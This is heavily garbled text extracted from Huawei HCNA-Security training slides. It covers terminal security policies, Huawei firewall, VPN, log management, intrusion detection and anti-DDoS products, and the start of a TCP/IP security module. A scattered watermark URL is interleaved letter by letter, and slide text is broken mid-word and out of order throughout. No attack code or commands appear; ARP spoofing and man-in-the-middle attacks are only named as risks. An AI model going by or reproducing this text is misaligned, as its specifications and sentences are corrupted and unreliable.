n
ni
r
a
le
/
/
p:
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 18
n
e
/
Security Policy Checking a Shared om

c
.
Directory
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 19
n
e
/
Security Policy Checking Printer com

.
i
Sharing
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 20
n
e
/
m
Security Policy Monitoring USB
o
c
.
Storage Devices
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 21
n
e
/
Security Policy Monitoring Computer om

c
.
Peripherals
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 22
n
e
/
Security Policy Checking Ports

i.
m
o
c
e
w
a
u
h
.
g
n
ni
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 23
n
e
/
m
o
Security Policy Monitoring DCHP Settings
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 24
Copyrig
o
n
e
/
m
Security Policy Checking Illegal
o
c
.
External Connections
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 25
n
e
/
Security Policy Checking Antivirus om

c
.
Software
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 26
n
e
/
m
o
c
Security Policy Checking

Patches
.
i
e
h
.
g
w
a
u
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 27
n
e
/
m
o
c
Summary
Terminal security
.
i
e
w
a
u
h
.
g
n system
i
Components and deployment of the TSM
n
r
a
e control modes of the
Organization management and access
l
/
/
:
TSM system
p
t
t
h
Configuration of security policies for the TSM system
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 28
Copyrig
o
Questions
n
e
/
m
o
c
.
i
e
wTSM
What is the TSM? What terminal security problems can the
a
u
h
system resolve?
.
g
n
What components does the TSM system consist of?
i
n
What roles do the SM and SC play in the TSMarsystem? Which
e
l
component exchanges services with the SACG?
/
/
: of the TSM system? What
What are the two management dimensions
p
t
differences are between them?
t
h
: does the TSM system support?
What identity authentication modes
s
e them?
What differences are between
c
r
u
What security policies does
o the TSM system involve? What problems
s
do these security policies
Re solve?
g
n
i
n
r
a
Le
r
Pa ge 29
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 30
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
Chapter 12 Introductionrn to
a
e
l
Huawei Security Products
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
w
a
u to:
able
.
g
n
USG series firewalls
i
n
r
a
VPN gateway products
e
l
/
/
Security software products p:
t
t
h
SIG products
:
s
e
NIP products
c
r
u
o
Anti-DDoS solution
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
m
o
c
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. Huawei Security Products Overview

2. USG Series Products Overview
h
.
g
r
a
e
l
3. VPN Gateway Products Overview
/
/
:
p
4. Security Software ProductsttOverview
h
:
5. SIG Products Overview
s
e
c
r
u
6. NIP Products Overview
o
s
Re
7. Anti-DDoSgSolution Overview
n
i
n
r
a
e
L
r
Copyrig
o
n
i
n
Pa ge 2
n
e
/
m
o
c
Security Products Overview

Spam database
Application protocol category

database (DPI)
URL category database
Virus/Malware signature
database
Intrusion/Vulnerability
signature database
Network and content

security
USG5000
USG9000
s:
Secure routing gateway

USG2000BSR/HSR
Online upgrade platform
.
g
n
i
n
Reputation evaluation
center
r
a
le
Firewall
UTM
USG2000
Emergent security fault

response
Service center
Ability center
Security
services
Botnet signature database
e
c
r
USG5000BSR/HSR
.
i
e
aw
hu
Security management
center
Security management
services
Security consulting
Anti-DDoS solution
USG5000-ADI/ADD
/
/
p:
t
t
hSSL VPN
USG9000
ATIC
IDS
SVN3000
NIP1000
NIP200
u
o
s
Security
software
e
R
Terminal security management
g
n
i
n
r
a
Le
TSM
Terminal Security Mgmt
e
r
o
DSM
Document Security Mgmt
Mgmt Center
Security management
VSM
eLog
Unified
Log Mgmt and Audit
Management
Pa ge 3
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
r
a
e
l
/
/
:
p
h
:
s
e
c
r
u
o
s
Re
n
i
n
r
a
e
L
r
Copyrig
o
n
i
n
Pa ge 4
n
e
/
m
o
c
Huawei USG Series Products
.
i
e
w
a
u
h
.
g
USG5120, USG5150
USG2205
n
i
n
USG2210, USG2230
USG2130, USG2130W
USG2160, USG2160W
USG2110
:
s
e
c
r
Office
Small branch
Remote site
Office
n
r
a
e
r
o
g
n
i
r
a
le
USG2250, USG2260
/
/
p:
t enterprise
Small
t
h headquarters
Enterprise
headquarters
Large branch
Large branch
u
o
s
Re
Le
Pa ge 5
n
e
/
m
o
c
.
i
e
USG2110 Fixed Model
Firewall throughput (large packets): 150

Mbit/s
Number of concurrent connections:
100,000
n
i
n
r
a
le
/
/
p:
Features
h
.
g
Performance
w
a
u
2WAN+8FE (desktop model)

Fixed configuration
t
t
h
:
s
e
c
r Model
Basic firewall/VPN functions

PPPoA/DDNS/TR069
Description
u
SOHO users (1U to 20U)
2FE+8FE, 1USB
o USG2110-F
s
USG2110-F-W
2FE+8FE, 1USB, WiFi
Re
USG2110-A-W
1FE, 1ADSL+8FE, 1USB, WiFi
g
n
USG2110-A-GW-C
1FE, 1ADSL+8FE, 1USB, WiFi, 3G-CDMA2000
i
n
USG2110-A-GW-W
1FE, 1ADSL+8FE, 1USB, WiFi, 3G-WCDMA
r
a
USG2110-A-GW-T
1FE, 1ADSL+8FE, 1USB, WiFi, 3G-TD-SCDMA
e
L
r
Pa ge 6
Copyrig
o
n
e
/
m
o
c
USG2100 Series
1FE+8FE (chassis model)

1/2 x extended slot (USG2130/2160)
Serial/E1/ADSL2+/FE/GE/3G/G.SHDSL
Built-in WiFi (-W models)

Complete UTM features (license control)
IPS/Antivirus/Anti-spam/URL filtering
IPv6 support
VPN functions
L2TP/SSL/IPSec/MPLS/GRE
Performance
Firewall throughput (large packets):

200 Mbit/s

200,000
Small branch users (30 U to 100 U)
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
t
t
h
Model
Description
USG2130
1FE+8FE, 1USB.1MIC
USG2130-W
1FE+8FE, 1USB.1MIC, WiFi
USG2160
1FE+8FE, 1USB.2MIC
USG2160-W
1FE+8FE, 1USB.2MIC, WiFi
Le
Pa ge 7
n
e
/
m
o
c
USG2200 Series
2GE Combo (chassis model)

4MIC+2FIC expansion slot
FE/GE/Serial/E1/ADSL2+/G.SHDSL/3
G/WiFi
Multi-service open platform (X86)

Complete UTM features (license
control)
IPS/Antivirus/Anti-spam/URL
filtering
IPv6 support
VPN functions
DC power model: USG2250
Medium-sized enterprise users (200U
to 500U)
ou
:
s
e
c
r
n
r
a
e
r
o
g
n
i
s
e
R
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
t
t
h
Model
Description
USG2210
2GE Combo, 2USB.4MIC+2FIC
USG2220
USG2230
USG2250AC/DC
Le
Pa ge 8
n
e
/
m
o
c
USG5120
2GE+2GE Combo (chassis model)

4MIC+2FIC+2DFIC expansion slot
FE/GE/Serial/E1/ADSL2+/G.SHDSL/3G/WiFi

IPv6 support
VPN functions
Performance
Firewall throughput (large packets): 2000

Mbit/s

Model
1 million
USG5120
DC power model
Medium-sized enterprise users (500U to
USG5120-DC
700U)
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Description
2GE+2GE Combo,
2USB.4MIC+2FIC+2DFIC
2GE+2GE Combo,
2USB.4MIC+2FIC+2DFIC, DC
power supply
Le
Pa ge 9
n
e
/
m
o
c
USG5150
n
i
n
r
a
le
/
/
p:
IPv6 support
VPN functions
h
.
g
FE/GE/Serial/E1/ADSL2+/G.SHDSL/3G/WiFi
w
a
u
4GE Combo (chassis model)

4MIC+2FIC+4DFIC expansion slot
.
i
e
t
t
h
:
s
e 4000
Firewall throughput (large packets):
c
r
Mbit/s
u
o
Number of concurrent s
connections:
2
million
Model
e
R
1+1 redundant power
supply
USG5150
g
n
Medium-sized enterprise
users (800U to USG5150-DC
i
n
1000U)
r
a
e
L
r
Copyrig
o
Performance
Description
4GE Combo, 2USB.4MIC+2FIC+4DFIC
4GE Combo, 2USB.4MIC+2FIC+4DFIC,
DC power supply
Pa ge 10
n
e
/
Application Scenario of Enterprise om

c
.
Security Protection
ei
w
a
u
h
.
g
/
/
p:
Enterprise
partner
Internet
n
r
a
Enterprise
branch
e
r
o
Le
g
n
i
:
s
e
c
r
u
o
VPNs
Re
r
a
le
USG5150
USG5120
USG2200
n
i
n
VPN
t
t
h
Enterprise
headquarters
USG2200
USG2100
Regional office
Remote site
Pa ge 11
n
e
/
Application Scenario of Enterprise VPN om

c
.
Access
i
e
w
a
u
h
.
g
n
USG5150
i
n
r
a
e
Enterprise
headquarters
l
/
/
:
p
t
t
h
Internet
ADSL :
E1
USG2210
s
e
FE
c
r
u
USG2130
o
s
USG2230
Re
g
n
i
n
IPSec VPN tunnel
r
a
e
L
e
r
o
Pa ge 12
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
r
a
e
l
/
/
:
p
h
:
s
e
c
r
u
o
s
Re
n
i
n
r
a
e
L
r
Copyrig
o
n
i
n
Pa ge 13
n
e
/
m
o
c
Functions of the SVN3000

SVN3000 secure access gateway
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
Advanced
virtual
gateway
s:
e
c
r
u
o
s
Port
proxy
n
r
a
e
r
o
g
n
i
t
t
h
File sharing
Web
proxy
Re
Network
expansion
Complete
logging
functions
User security
control
Le
Pa ge 14
n
e
/
Carrier-Class Hardware Platform of the om

c
.
SVN3000
i
e
w
a
u
h
.
g
Item
SVN3000
n
i
n
r
Ports
Fixed ports: 3 x 10/100/1000M
combo ports
a
e
l
Dual
/ power supply
/
: V to 240 V, 50/60 Hz
Power supply
AC:p100
t DC: 48 V to 60 V
t
h mm x 436 mm x 420 mm, for 19-inch
1U: 44.45
:
Dimensions (H x W x D)
s
cabinets
e
c
r
u
Fans
7 built-in fans
o
s
e
R
g
n
i
n
r
a
Le
e
r
o
Pa ge 15
n
e
/
m
o
c
Front Panel of the SVN3000
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
t
t
h
(Optical/El
:
s
ectrical)
e
c
ur
Type
Port
Rate
o
s
e
PORT0
PORT1
PORT2
10/100/1000M
R
combo
g
n
ni
/
/
p: Indicator
PWR0
PWR0 state
PWR1
PWR1 state
SYS
System state
RJ45/SPF
r
a
console e 9,600 bit/s
RJ45
L
r
Copyrig
o
ACT
Active/Standby
state
Pa ge 16
n
e
/
m
o
c
Rear Panel of the SVN3000
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
t
t
h
Rear panel of the SVN3000 AC model
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
Rear panel of the SVN3000 DC model
Pa ge 17
n
e
/
m
o
Typical Networking of the SVN3000i.c
e
w
a
u
h
.
g
n
Residential building
i File server
Hotel
n
r
a
e Web server
Mail server
l
/
SMC
/
:
NMS
p
t
t
h
Business hall
experience
Mobile office employeeBest access
:
system(BOSS)
s
e
cWYSIWYG
r
Fast deployment
Free of client
u
o Requested resources Fast deployment
A terminal can access
s
without changing
e
the application system
are
displayed
on
the
R
intranet topology
through a Web g
Web page item by
Simple user and
n
browser without
the
item,
forming
a
clear
i
permission management
installationnof special
view of available
r
achieved by user-friendly
software.
intranet services.
a
Web pages
Le
r
Pa ge 18
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
r
a
e
l
/
/
:
p
h
:
s
e
c
r
u
o
s
Re
n
i
n
r
a
e
L
r
Copyrig
o
n
i
n
Pa ge 19
n
e
/
m
Terminal Security Management (TSM)
o
c
.
i
System Overview
e
w
Product positioning:
a
u
All-in-one terminal security solution for
h
.
enterprises
g
n
Application scenarios:
i
n
Secure terminal access and security
r
a
policy management
e
l
Employee behavior auditing and mobile
/
device management
/
:
Asset management, software
p
t
distribution, and patch management
ht
Key performance:
Supporting mainstream Windowss:
operating systems, including
e
c
XP/2000/Vista/Windows 7
urto 20,000
Single server supporting o
up
s
concurrent users
e
R
Product features:
g
n
Distributed deployment
architecture to provide the highest performance,
i
n
reliability, and
scalability
in
the industry, and completely eliminate network
r
bottlenecks
a in network devices
e
L
e
r
o
Access control
Security policy
management
Patch management
Software distribution
Asset management
010101010
Employee behavior
management
010101010
010101010
Secospace
TSM
Pa ge 20
n
e
/
m
o
c
Functions of the TSM
.
i
e
w
a
u
h
.
g
TSM
Security Access
Control
SACG mode
802.1X control
mode
Host firewallbased access
control mode
AD/LDAP/CA
interworking
authentication
Agent client
Non-Agent IE
controller
Anti-virus
software
interworking
check
Operating system,
IE, and Office
patch check
Host security
check covering
system accounts
and registries
Shared file and
printer check
One-click
intelligent
recovery
n
r
a
e
r
o
Le
User Behavior
Audit
Security
Policy Check
g
n
i
Access behavior
management
PC peripheral
management
USB device
monitoring
Illegitimate
external
connection
management
ARP protection
Network traffic
monitoring
Process and
service
monitoring
Re
u
o
s
:
s
e
c
r
Patch
Management
r
Software
a
leDistribution
/
/
p:
WSUS
interworking
User-defined
patch
distribution
policy
Efficient patch
distribution
based on
patent
technologies
Patch filtering
Patch statistics
and reports
n
i
n
t
t
h
Time-specific
software
distribution
task
Resumable
download and
integrity check
Automatic
running of
executable files
Detailed
distribution
status reports
Terminal Security Management Solution
Pa ge 21
Asset
Management
Asset registration
Asset lifecycle
management
Asset statistics
Software license
management
Asset change
alarm
Server platform
monitoring
Bulletin and
remote assistance
n
e
/
m
o
c
TSM Deployment Topology
TSM management center (TMC, optional)
Security Manager (SM)
Security Controller (SC)
Security Access Control Gateway (SACG)
Security Agent (SA)
Service server 1
w
a
Upper-level
system administrator
u
h
.
g
n
ni
TMC
WAN
Pre-authentication
TSM
management
node 1
.
i
e
domain
r
a
le
/
/
p:
TSM
management
node n
t
t
Post-authenticationh
domain
:
s
e
c
r
u
so
SM SC
Service server 2
Pre-authentication
SM SC
Post-authentication
domain
Service server 1
Service server 2
Patch server
Core Network
SACG
ar
ni
e
r
o
ng
e A
LProvince
Re
domain
Patch server
Core Network
Antivirus (AV) server
AV server
SACG
File repair
File repair server
server
Isolation
Isolation
domain
domain
Province B
Pa ge 22
n
e
/
m
Document Security Management (DSM) System
o
c
.
Overview
i
e
Powerful dynamic
w
encryption and
a
decryption
u
h
technologies
Enterprise document security solution
.
Real-time
document
g
permission control
n
Preventing unauthorized document use
Group policy and
i
by employees
permission template n
r
Preventing information disclosure
Secospace DSM
a
through documents spreading
e
l
Auditing document use
/
/
Key performance:
:
Single server supporting up to 20,000
p
t
users, 200 concurrent users, and a
User
Web client
Account and
Log
t
throughput of 2,000 users/minute
department
h management
auditing login logs
Supporting mainstream document
management
Document
:roaming
types such as Word\PPT\Excel\PDF\JPG
User
operation logs
s
eCross-system
Supporting document permissions
authorization
c
such as read-only, read-write,
r
replication, distribution, print (times
uuse
controllable), full control, and offline
o
s
e
Product features:
R
Dynamic encryption g
and decryption combining the application and driver layers, real-time permission
n
i key management, complete log auditing, centralized and distributed deployment; highmanagement, centralized
n
r
availability, high-performance,
and scalable architecture to provide a unified and powerful document security
a
managemente
L platform
r
Pa ge 23
Copyrig
o
Document
permission
management
n
e
/
m
o
c
DSM Deployment
.
i
e
w
a
u
h
.
g
n
i
n
Powerful dynamic encryption and Document

permission
decryption technologies
Real-time document permission management
control
Group policy and permission
Secospace DSM
template
r
a
le
/
/
p:
Account and department

management
User roaming
Cross-system authorization
n
r
a
e
r
o
g
n
i
:
s
User e
c
management
r
u
o
s
e
R
t
t
h
Log
auditing
Web client login logs

Document operation logs
Le
Pa ge 25
n
e
/
m
o
c
DSM Deployment Topology
.
i
e
w
a
u
h
.
g
DSM management center (DMC)

DSM server (DS)
n
i
n
DMC
DSM client (DC)
DSM management
node
:
s
e
c
r
DS1
System administrator
r
a
Core network e
l
/
/
:
pDSM management
t
ht node DS2
u
o
s
n
r
a
e
r
o
Le
e
R
DC
g
n
i
DC
DC
DC
Province A
DC
Province B
Pa ge 26
DC
n
e
/
m
Functions of the eLog Log Management .System
co
i
e
w
NAT log management
a
u
NAT logs of firewalls, routers, and BRAS devices
h
. destination ports,
Translation of source IP addresses, source ports, destination IP addresses,
g
and protocol type
n
i
Network traffic auditing
n
r
Working with the UTM device to provide an intuitive view of
a the basic traffic, application
e
traffic, interface traffic, and P2P traffic in the form of reports
l system (IPS), mail filtering, virus
Displaying multi-dimensional statistics of intrusion prevention
/
/and defense services; and printing the
detection, URL auditing, and instant messaging (IM),
:
statistics in the form of reports
p
t
t
Database and operating system auditing
h
Audit the database through the off-line deployment of the behavior auditing probe
:system logs
s
Audit the operating system by collecting
e translation, behavior monitoring, and restoration
Application-layer protocol (FTP/Telnet/HTTP)
c
r
Through the behavior auditinguprobe
ofor network resources
s
Unified log management platform
Redevices, hosts, Web servers, and application systems
Network devices, security
functions
Rich alarm managementg
n
Alarming by means
i of mail, short message, alarm box, and audible and visual alarms
n
Alarm monitoring
r and alarm statistics
a
Le
r
Pa ge 28
Copyrig
o
n
e
/
Overview of the Versatile Security om

c
.
i
Management (VSM) System
e
w
a
u industrial
Sold along with security products as a total solution for Chinese and overseas
h
customers; deployed with the U2000 component on the SP network g.
n
i
n
r
Unified management of switches, routers, and security products
a
e
TMN standard framework:
l
/
Service management layer
/
:
Network management layer
p
t
Network element (NE) management layer t
h
Communication modes:
:
s
SNMP, SFTP, and SSH
e
c
Product features:
r or out-of-band networking, topology management, NE
u
C/S architecture, in-band networking
o
s
management, performance management,
centralized policy configuration management, fault
e
management, and VPN management
for Eudemon/USG/SIG full series security devices and
R
mainstream network g
devices; intuitive network topology view to help administrators quickly
n
locate network faults,
improve management, increase work efficiency, and reduce maintenance
i
n efficient management platform of all devices on the network
cost, providing an
r
a
e
L
e
r
o
Console
Management Collection
server
server
Pa ge 29
n
e
/
m
o
c
Functions of the VSM
.
i
e
w
a
u
Unified management platform for network and security

devices
.h
NE management
Topology
management
Device
management
Board
management
Interface
management
Routing and
switching devices
e
r
o
Performance
management
Fault management
Alarm browsing
and statistics
Alarm
confirmation and
synchronization
Correlation rule
Alarm screening
Remote
notification
Alarm dumping
:
s
e
c
r
Policy
r
a configuration
e
l
/
/
p:
Performance
monitoring
Real-time
management
Performance
statistics
g
n
ni
t
t
h
u
o
s
Re
Security policy
Virtual firewall
Anti-attack
L2TP VPN policy
IPSec VPN
policy
Single-point
Web
configuration
Northbound
interface
SNMP
CORBA
FTP
XML
TEXT
g
n
i self management capabilities of the system
Complete
n
r
a
Le
Pa ge 30
n
e
/
m
o
c
VSM Deployment Topology
.
i
e
w
a
u
h
.
g
Enterprise headquarters
Security policy center
r
a
le
Secospace TSM
SSL VPN gate
way
SACG
n
i
n
VSM
SIG NIP intrusion

detection
:
s
e
c
r
Switch
/
/
p:
t
t
SSL/IPSec
h
VPN
ou
Intranet
e
r
o
n
r
a
g
n
i
TSM Agent
Le
Data center
USG
firewall
Branch
IPSec
VPN
USG
firewall
Router
Internet
USG firewall
s
e
R
NIP intrusion
detection
IPSec
VPN
Partner
SSL/IPSec
VPN
Mobile user
DMZ
Pa ge 31
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
r
a
e
l
/
/
:
p
h
:
s
e
c
r
u
o
s
Re
n
i
n
r
a
e
L
r
Copyrig
o
n
i
n
Pa ge 32
n
e
/
m
o
Service Inspection Gateway (SIG) .c
i the value of
The SIG is delivered by Huawei to help customers add to and maintain
e
w VoIP service
their MAN services. It provides functions such as service traffic flow analysis,
a
u traffic (such as
monitoring, P2P service monitoring, shared access monitoring, abnormal
h
DDoS traffic) monitoring, user behavior analysis, and intelligent Web
. pushing.
g
n
i
Service awareness
n
Understanding traffic composition, distribution, and trend as r
a
basis for network planning
e
Traffic
l
Monitoring network applications and exploring new service
/
flow
growth points
/
P2P
:
Flow control
p
Controlling P2P traffic to release bandwidth and
reduce
t
DDoS
t
internetwork settlement cost
h such as
Monitoring
Improving user experiences in other applications
Web page browsing, gaming, and stock :
trading
Control
s
Unified platform
Illegitimate service control
e
c
Preventing illegitimate Internet connections
by illegitimate
r
Internet cafes and small enterprises,
to help operators
Security
u
Web
increase broadband service revenues
o
s
management
pushing
Restricting illegitimate VoIP
operation
e
Value-added service operation
R
Illegitimate
Statistics of the mostginterested websites of users, user
classification by interest,
and top N websites
nbehavior
VoIP
Behavior
i
Interest and instant
based
intelligent
n
analysis
advertisementrpushing
amonitoring to provide secure broadband
DDoS attack
e
networks
L
r
Pa ge 33
Copyrig
o
n
e
/
m
SIG9280E/1000E High-Integrity 10G Off-line
o
c
.
i
DPI Device
e
w
a
u
Model
SIG1000E
hSIG9280E
.
g
n
Appearance
Rackmount, 5U
iRackmount, 14U
SIG1000E
n
r 10G POS, 10GE, 4 x 2.5G
Type of extended 10G POS, 10GE, 4 x a
e POS, 8 x GE
interface cards
2.5G POS, 8 x GE l
/
/
Number of
:
p
extended
4
12
t
interface cards
ht
Extended service 4 x:service board, 2 x
12 x service board, 2 x
s
slots
switching board
switching board
e
c DC/AC; dual power
r
SIG9280E
Power supplyu
DC/AC; dual power supply
supply
o
s
e
Key component
High
12 xR10G access
High
redundancy
density
availability
g
n
i
n 12 x service
High
High
r
2.5G/10G POS
a
board
flexibility
scalability
Le
r
Pa ge 34
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
r
a
e
l
/
/
:
p
h
:
s
e
c
r
u
o
s
Re
n
i
n
r
a
e
L
r
Copyrig
o
n
i
n
Pa ge 35
n
e
/
m
o
c
Overview of the NIP Intrusion

Detection System (IDS)
IDC and enterprises of all sizes

1000/100M intranet intrusion detection and

behavior auditing
IDC 1000/100M security defense intrusion

detection
Key performance:
NIP200: 200 Mbit/s throughput, 250,000

concurrent users
NIP1000: 1 Gbit/s throughput, 1 million concurrent

users
Hardware specifications:
NIP200: 3 x GE electrical port
NIP1000: 2 x GE electrical port + 2 x GE optical

port
Product features:
Special application-layer accelerating engine and

efficient algorithm for high-speed, efficient, and
accurate detection
Special virtual engine technology to provide all-inone functions at lower cost
Professional security anti-attack labs to adapt to

the latest network attack prevention technologies in
the world and maintain technical edges
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
rn
e
r
o
a
e
L
g
n
i
NIP200
Re
NIP1000
Pa ge 36
n
e
/
m
o
c
Functions of the NIP IDS

Security event
response
n
i
n
Worm detection
Protocol decoding
IP fragment reassembly
Log storm processing
Protocol filtering and false
positive processing
r
a
le
/
/
p:
:
s
equery
c
Log
r
Log replication
u
o
Log management
Engine status monitoring

Server status monitoring
Email and MSN monitoring
File transfer and real-time
session monitoring
Harmful website monitoring
Multi-port listening
e
r
o
Alarming
Logging
Session disconnection
Program execution
Firewall interworking
t
t
h
System activity and

status monitoring
n
r
a
w
a
u
h
.
g
Intrusion detection
and analysis
g
n
i
.
i
e
s
e
R
Statistics
Intrusion statistics
Traffic statistics
Log synchronization
Log deletion
Log compression
Le
Pa ge 37
n
e
/
m
o
c
NIP IDS Deployment Topology
.
i
e
w
a
u
Switch
Firewall
h
.
g
n
i
n
Router
r
a
le
Intranet
Internet
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
NIP console
i
n
r
ng
e
r
o
Re
NIP engine
a
e
L
Pa ge 40
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
r
a
e
l
/
/
:
p
h
:
s
e
c
r
u
o
s
Re
n
i
n
r
a
e
L
r
Copyrig
o
n
i
n
Pa ge 41
n
e
/
m
o
c
Overview of the Anti-DDoS Solution
.
i
e
w
a
u
Solution positioning:
h
.
g
Professional anti-DDoS solution
n
i
n
r
a
e
DMZ service protection for customers in the following
industries:
l
/
/
Banks and securities
:
p
t
Government (public security, HR, andtstatistics
departments)
h
Portal websites
:
s
e as the key services
Other industries with DMZ c
services
r
u
Components:
o
s
Detection center device:
Re ADG 5320-I
g ADG 5320-D
Cleaning device:
n
i
n
Management
r center: VSM
a
ADG 5320
e
L
r
Pa ge 42
Copyrig
o
n
e
/
Anti-DDoS Solution Deployment

m
o
c
.
i
Topology
e
aw
u
h
.
Management
center
Upper-level
network
Network
egress
r
a
le Device management
Policy
interworking
Anti-DDoS solution
/
/
p:
:
s
e
c
r
u
o
s
Network
access
n
r
a
e
r
o
g
n
i
g
n
ni
Policy management
Reporting
t
Detection
ht center
Professional traffic
analysis device
Cleaning center
Professional traffic
cleaning device
Re
Le
Control
interworking
Pa ge 43
n
e
/
m
o
c
Summary
.
i
e
w
a
u
h
.
g
USG series firewalls
n
i
n
VPN gateway products
Security software products
SIG products
NIP products
Anti-DDoS solution
u
n
r
a
e
r
o
g
n
i
o
s
e
:
s
e
c
r
r
a
le
/
/
p:
t
t
h
Le
Pa ge 44
n
e
/
m
o
c
Questions
What security products can Huawei deliver? h
w
a
u
.
i
e
.
g
n Huawei
i
What main software security products can
n
r
a
provide?
e
l
/
/
:
What are the characteristics or
p modes of Huawei security
t
ht
products deployment?
:
s
e
c
What problems can Huawei
security products resolve?
r
u
o
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 45
Copyrig
o
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re

HCNA-Security-CBSN Constructing Basic Security Network Training

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

HCNA-Security-CBSN Constructing Basic Security Network Training

Caricato da

Copyright:

Formati disponibili

The privilege of HCNA/HCNP/HCIE:

ContentAll Huawei Career Certification E-Learning courses

1Comprehensive E-Learning Courses

1. OSI Model Introduction

3. TCP/IP Security Issues

4. Common Network Attackstt

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

OSI Model Generation

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Introduction to Seven Layers of the OSIom

Procedure for Processing Network Dataom

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

1. OSI Model Introduction

3. TCP/IP Security Issues

4. Common Network Attackstt

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Encapsulation and Decapsulation Processesom

APP User data

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Source socket: source IP address + protocol + source port

Destination socket: destination IP address + protocol + destination

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Data Link Layer Protocol

Ethernet protocol encapsulation

Type 0800: indicates IP.

Type 0806: indicates ARP.

Type 8035: indicates RARP.

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Protocol address length

Hardware address length

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Network Layer Protocol

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Transport Layer Protocol

UDP checksum (optional)

Head length Reserved (6 bits)

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

TCP Connection Establishment

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

TCP Connection Cutoff

Passively cut off

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

1. OSI Model Introduction

3. TCP/IP Security Issues

4. Common Network Attackstt

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

TCP/IP Security Risks

Lacking the data source verification mechanism

Lacking the integrity verification mechanism

Lacking the confidentiality guarantee mechanism

Common security risks

ARP Security Risks

Gateway IP address: 192.168.0.1

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Inter-node trust relationship: Build the trust relationship through IP addresses.

Man-in-the-middle attack: Forge legitimate IP addresses to obtain confidential

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

TCP Security Risks

Spoofed packet from C to A

Spoofed packet from B to A

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

1. OSI Model Introduction

